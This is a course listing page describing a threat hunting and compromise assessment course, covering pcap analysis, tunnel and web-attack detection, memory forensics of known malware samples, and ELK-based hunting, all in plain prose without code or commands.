OpenCourser
Learn skills that shape your future
Visit OpenCourser.com
In this course students will learn counducting threat hunting and compromise assessment. In the first module I created a real life attack scenerio as an adversary simulation in a demo lab. I lecture to my students about cyber threat intelligence sources and types, basic definition and terms like I critisize security devices capabilities for explaining why we need monitoring and SIEM infrastructure. In the second module I give you therotical knowledge about real attack techniques like SQL Injection, Buffer OverFlow Exploit Codes, SSH tunneling methods and more... I teach to my students how to collect full pcap traffic and which tools should be used for analysing. In module two I analysis tunnels, pivot points, web attacks, Remote Code Execution Exploits, Web Shells and Web attacks traffic from pcap files and I share my real world analysis experince with my students. In third module, First I present the fundamental windows processes and process injections, hollowing techniques and tools, pe injection and thread injection techniques and tools as theoritically. Then I teach you dumping memory samples for memory forensic and I analyze Stuxnet attack's memory image, Cridex, Zeus, Darkcomet Rat's Memory images and DLL injection event's memory image. In fourth module I perform therat hunting over ELK. First I explain the event id numbers which are used common for hunting and I analyze a real life scenerio. I detected malicious word documents, hta files, unsigned exe files, vbs files and more. I teach you how to detect and investigate tunneling methods, persistency methods like registeries, services, schedule tasks. Some techniques are used like lolbas in attack lab and we investigate and map them by using MITRE framework. Google Rapid Response And Osquery usage and labs are performed by me.
In this course students will learn counducting threat hunting and compromise assessment. In the first module I created a real life attack scenerio as an adversary simulation in a demo lab. I lecture to my students about cyber threat intelligence sources and types, basic definition and terms like I critisize security devices capabilities for explaining why we need monitoring and SIEM infrastructure. In the second module I give you therotical knowledge about real attack techniques like SQL Injection, Buffer OverFlow Exploit Codes, SSH tunneling methods and more... I teach to my students how to collect full pcap traffic and which tools should be used for analysing. In module two I analysis tunnels, pivot points, web attacks, Remote Code Execution Exploits, Web Shells and Web attacks traffic from pcap files and I share my real world analysis experince with my students. In third module, First I present the fundamental windows processes and process injections, hollowing techniques and tools, pe injection and thread injection techniques and tools as theoritically. Then I teach you dumping memory samples for memory forensic and I analyze Stuxnet attack's memory image, Cridex, Zeus, Darkcomet Rat's Memory images and DLL injection event's memory image. In fourth module I perform therat hunting over ELK. First I explain the event id numbers which are used common for hunting and I analyze a real life scenerio. I detected malicious word documents, hta files, unsigned exe files, vbs files and more. I teach you how to detect and investigate tunneling methods, persistency methods like registeries, services, schedule tasks. Some techniques are used like lolbas in attack lab and we investigate and map them by using MITRE framework. Google Rapid Response And Osquery usage and labs are performed by me.
Important Note: My Udemy Training only includes the videos. Memory images, pcaps and virtual machines aren't shared in Udemy. I am creating lab environment in a different platform in Cloud and when I complete the Lab network in cloud I will announce and You can purchase separately from this.
I will teach you calculating for our requirements for full packet collection. You will learn tools and systems for collecting full pcap capture in a network. Also you find out why we implement network forensic for detection.
In this lesson We analyzed basic protocols connections like Mysql, HTTP, FTP, NFS. You will learn Wireshark basics and basic protocol analysis.
Students will analyze the DNS and SMTP packets for detecting phishing attacks. They will learn how to extract malicious files from network traffic.
In this lesson student learns to detect protocol-port mismatches.
In this lesson students learn how to detect malware or attack traffic from anormal user agents.
In this lesson students learn analysing Ransomware traffic and examining the trafic patterns.
In this lesson students learn Remote Code Execution exploit mechanism theoritaclly. After that they will learn how to detect a shellcode, return address and nop values for finding exploit code in the network traffic.
In this lesson students learn how to detect SSH tunnels in the Network traffic. First I explain the SSH tunnel mechanism as theoritaclly and I show you how to establish a SSH tunnel and you will analyze it.
In this lesson students learn how to detect ICMP tunnels in the Network traffic. First I explain the ICMP tunnel mechanism as theoritaclly and I show you how to establish a ICMP tunnel and you will analyze it.
In this lesson students learn how to detect DNS tunnels in the Network traffic. First I explain the DNS tunnel mechanism as theoritaclly and I show you how to establish a DNS tunnel and you will analyze it.
You will teach you performing timeline analysis and mapping the tunnels for solving the node to clearify to pivot pionts in network.
Sql injection basics are explained in a an example source code as therotically and you will learn how to analyze and detect SQL injection in network traffic.
Command injection basics are explained in a an example source code as therotically and you will learn how to analyze and detect Command injection in network traffic.
You will learn fundamental functions of webshells and their execution analysis. In this lesson you will learn how to detect web shells in network traffic.
File Upload basics are explained in a an example source code as therotically and you will learn how to analyze and detect File upload attacks in network traffic.
RFI/LFI basics are explained in a an example source code as therotically and you will learn how to analyze and detect RFI/LFI attacks in network traffic.
You will learn to basic XSS detection by investigating network traffic.
In this lesson you are gonna learn Cyber Kill Chain Method by watching a real life attack scenerio in a lab network. Various techniques are used like port scanning, client side attacks with malicious documents, RCE exploits, lateral movment, tunnelling techniques like ICMP, DNS, L2 VPN pivoting, socks5, web attacks, password attacks. I learn you step by step Cyber Kill Chaing during you are watching the attack cycle.
In this lesson we have created a scenerio based hacking techniques and we critisized the security devices. We created a table for talking about security devices detection and prevention capabilities for explaining our SIEM and Network Monitoring needs.
SaveSaveSaveSaveSaveSaveOpenCourser helps millions of learners each year. People visit us to learn workspace skills, ace their exams, and nurture their curiosity.
Our extensive catalog contains over 50,000 courses and twice as many books. Browse by search, by topic, or even by career interests. We'll match you to the right resources quickly.
Find this site helpful? Tell a friend about us.
We're supported by our community of learners. When you purchase or subscribe to courses and programs or purchase books, we may earn a commission from our partners.
Your purchases help us maintain our catalog and keep our servers humming without ads.
Thank you for supporting OpenCourser.
